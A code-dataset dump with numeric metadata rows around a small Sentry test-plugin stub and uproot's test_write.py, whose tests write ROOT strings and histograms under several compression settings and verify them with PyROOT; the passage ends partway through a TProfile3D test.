| 0.559957
| 265
| 2,777
| 5.750943
| 0.181132
| 0.183727
| 0.229659
| 0.266404
| 0.885171
| 0.885171
| 0.839239
| 0.839239
| 0.839239
| 0.839239
| 0
| 0.056644
| 0.31977
| 2,777
| 84
| 100
| 33.059524
| 0.750132
| 0.016205
| 0
| 0.871795
| 1
| 0
| 0.098169
| 0.008425
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
767201f19522323aa582e32d3263ff2de7393faa
| 154
|
py
|
Python
|
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/bitbucket/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from test_only_plugins.base import assert_package_not_installed
assert_package_not_installed("sentry-bitbucket")
| 25.666667
| 63
| 0.88961
| 21
| 154
| 5.904762
| 0.666667
| 0.209677
| 0.258065
| 0.403226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 154
| 5
| 64
| 30.8
| 0.867133
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
96ee17a450f73310d5769d1d982cc3a4d337b28a
| 38,252
|
py
|
Python
|
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_write.py
|
oshadura/uproot
|
5be40b068155dab444c69ecec4998ffb0fcf3384
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot/blob/master/LICENSE
from os.path import join
import pytest
import uproot
ROOT = pytest.importorskip("ROOT")
def test_strings(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=None) as f:
f["hello"] = "world"
f = ROOT.TFile.Open(filename)
assert str(f.Get("hello")) == "world"
f.Close()
def test_cycle(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=None) as f:
f["hello"] = "world"
f["hello"] = "uproot"
f = ROOT.TFile.Open(filename)
assert str(f.Get("hello;1")) == "world"
assert str(f.Get("hello;2")) == "uproot"
f.Close()
def test_zlib(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=uproot.ZLIB(1)) as f:
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert f.GetCompressionAlgorithm() == uproot.const.kZLIB
assert f.GetCompressionLevel() == 1
assert str(f.Get("hello")) == "a"*2000
f.Close()
def test_compresschange(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=uproot.ZLIB(2)) as f:
f.compression = uproot.ZLIB(3)
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert f.GetCompressionAlgorithm() == uproot.const.kZLIB
assert f.GetCompressionLevel() == 3
def test_nocompress(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=None) as f:
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert f.GetCompressionFactor() == 1
assert str(f.Get("hello")) == "a"*2000
f.Close()
def test_lzma(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=uproot.LZMA(1)) as f:
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert f.GetCompressionAlgorithm() == uproot.const.kLZMA
assert f.GetCompressionLevel() == 1
assert str(f.Get("hello")) == "a"*2000
f.Close()
def test_lz4_leveldown(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=uproot.LZ4(5)) as f:
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert (f.GetCompressionAlgorithm()) == uproot.const.kLZ4
assert str(f.Get("hello")) == "a"*2000
f.Close()
def test_lz4_levelup(tmp_path):
filename = join(str(tmp_path), "example.root")
with uproot.recreate(filename, compression=uproot.LZ4(5)) as f:
f["hello"] = "a"*2000
f = ROOT.TFile.Open(filename)
assert (f.GetCompressionAlgorithm()) == uproot.const.kLZ4
assert (f.GetCompressionLevel()) == 5
assert str(f.Get("hello")) == "a"*2000
f.Close()
def test_th1(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Sumw2()
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [7.0, 0.0, 0.0, 0.0, 0.0]
assert list(h.GetSumw2()) == sums
count = 0
for x in range(1, 6):
assert h.GetBinContent(x) == bincontents[count]
count += 1
assert h.GetNbinsX() == 5
assert h.GetMean() == 1.5714285714285714
assert h.GetRMS() == 0.4948716593053938
def test_th1_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, 1, 10)
h.Sumw2()
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert "TH1" in uproot.open(filename)["test"]._classname.decode("utf-8")
def test_th1_varbin(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
bins = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, bins)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetBinWidth(1) == 2.0
assert h.GetBinWidth(2) == 1.0
assert h.GetBinWidth(3) == 6.0
assert h.GetBinWidth(4) == 1.0
assert h.GetBinWidth(5) == 1.0
def test_compressed_th1(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
bins = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH1F("hvar", "title", 5, bins)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.ZLIB(1)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetBinWidth(1) == 2.0
assert h.GetBinWidth(2) == 1.0
assert h.GetBinWidth(3) == 6.0
assert h.GetBinWidth(4) == 1.0
assert h.GetBinWidth(5) == 1.0
def test_th2(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Sumw2()
h.Fill(1.0, 5.0, 3)
h.Fill(2.0, 10.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 9.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 16.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0]
bincontents = [0.0, 3.0, 4.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
count = 0
for x in range(1, 6):
for y in range(1, 7):
assert h.GetBinContent(x, y) == bincontents[count]
count += 1
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5714285714285714
assert h.GetRMS() == 0.4948716593053938
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
def test_th2_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Sumw2()
h.Fill(1.0, 5.0, 3)
h.Fill(2.0, 10.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert "TH2" in uproot.open(filename)["test"]._classname.decode("utf-8")
def test_th2_varbin(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
binsx = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
binsy = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH2F("hvar", "title", 5, binsx, 6, binsy)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
def test_compressed_th2(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
binsx = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
binsy = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH2F("hvar", "title", 5, binsx, 6, binsy)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.ZLIB(1)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
def test_th3(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
h.Sumw2()
h.Fill(1.0, 5.0, 8.0, 3)
h.Fill(2.0, 10.0, 9.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 16.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
assert h.GetNbinsZ() == 7
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5714285714285714
assert h.GetRMS() == 0.4948716593053938
count = 0
for x in range(1, 6):
for y in range(1, 7):
for z in range(1, 8):
assert h.GetBinContent(x, y, z) == bincontents[count]
count += 1
def test_th3_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
h.Sumw2()
h.Fill(1.0, 5.0, 8.0, 3)
h.Fill(2.0, 10.0, 9.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert "TH3" in uproot.open(filename)["test"]._classname.decode("utf-8")
def test_th3_varbin(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
binsx = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
binsy = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
binsz = np.array([1.0, 10.0, 13.0, 14.0, 16.0, 20.0, 21.0, 23.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH3F("hvar", "title", 5, binsx, 6, binsy, 7, binsz)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
assert h.GetNbinsZ() == 7
def test_compressed_th3(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
import numpy as np
binsx = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
binsy = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
binsz = np.array([1.0, 10.0, 13.0, 14.0, 16.0, 20.0, 21.0, 23.0], dtype="float64")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TH3F("hvar", "title", 5, binsx, 6, binsy, 7, binsz)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.ZLIB(1)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
assert h.GetNbinsZ() == 7
def test_tprofile(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile("hvar", "title", 5, 1, 10)
h.Sumw2()
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [3.5, 0.0, 0.0, 0.0, 0.0]
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
count = 0
for x in range(1, 6):
assert h.GetBinContent(x) == bincontents[count]
count += 1
def test_tprofile_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile("hvar", "title", 5, 1, 10)
h.Sumw2()
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert uproot.open(filename)["test"]._classname == b"TProfile"
def test_compressed_tprofile(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile("hvar", "title", 5, 1, 10)
h.Sumw2()
h.Fill(1.0, 3)
h.Fill(2.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.LZMA(5)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
bincontents = [3.5, 0.0, 0.0, 0.0, 0.0]
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
count = 0
for x in range(1, 6):
assert h.GetBinContent(x) == bincontents[count]
count += 1
def test_tprofile2d(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Sumw2()
h.Fill(1.0, 5.0, 3)
h.Fill(2.0, 10.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 9.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 16.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0]
bincontents = [0.0, 3.0, 4.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
count = 0
for x in range(1, 6):
for y in range(1, 7):
assert h.GetBinContent(x, y) == bincontents[count]
count += 1
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
def test_tprofile2d_uproot(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Sumw2()
h.Fill(1.0, 5.0, 3)
h.Fill(2.0, 10.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
assert uproot.open(filename)["test"]._classname == b"TProfile2D"
def test_compressed_tprofile2d(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
h.Sumw2()
h.Fill(1.0, 5.0, 3)
h.Fill(2.0, 10.0, 4)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=uproot.LZMA(5)) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
sums = [0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 9.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 16.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0 , 0.0]
bincontents = [0.0, 3.0, 4.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
count = 0
for x in range(1, 6):
for y in range(1, 7):
assert h.GetBinContent(x, y) == bincontents[count]
count += 1
assert list(h.GetSumw2()) == sums
assert h.GetMean() == 1.5
assert h.GetRMS() == 0.5
assert h.GetNbinsX() == 5
assert h.GetNbinsY() == 6
def test_tprofile3d(tmp_path):
filename = join(str(tmp_path), "example.root")
testfile = join(str(tmp_path), "test.root")
f = ROOT.TFile.Open(testfile, "RECREATE")
h = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 8)
h.Sumw2()
h.Fill(1.0, 5.0, 3, 6)
h.Fill(2.0, 10.0, 4, 7)
h.Write()
f.Close()
t = uproot.open(testfile)
hist = t["hvar"]
with uproot.recreate(filename, compression=None) as f:
f["test"] = hist
f = ROOT.TFile.Open(filename)
h = f.Get("test")
